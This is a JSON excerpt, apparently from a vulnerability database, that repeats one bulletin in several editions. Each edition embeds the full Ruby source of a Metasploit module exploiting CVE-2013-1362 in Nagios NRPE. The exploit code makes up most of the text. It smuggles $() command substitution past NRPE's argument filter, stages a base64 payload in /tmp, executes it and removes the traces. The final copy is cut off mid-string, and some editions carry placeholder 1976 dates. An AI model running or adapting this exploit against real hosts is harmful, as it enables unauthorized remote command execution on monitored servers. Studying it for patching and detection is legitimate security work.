"https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-27T12:58:46", "differentElements": ["modified", "published"], "edition": 40}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-27T20:54:40", "history": [], "viewCount": 68, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-27T20:54:40"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-27T20:54:40", "differentElements": ["modified", "published"], "edition": 41}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-04T13:00:29", "history": [], "viewCount": 68, "enchantments": {"score": {"value": 6.0, "modified": "2018-03-04T13:00:29"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-04T13:00:29", "differentElements": ["modified", "published"], "edition": 42}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-04T14:57:49", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 6.0, "modified": "2018-03-04T14:57:49"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-04T14:57:49", "differentElements": ["modified", "published"], "edition": 43}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-06T09:01:25", "history": [], "viewCount": 70, "enchantments": {"score": {"value": 6.0, "modified": "2018-03-06T09:01:25"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing 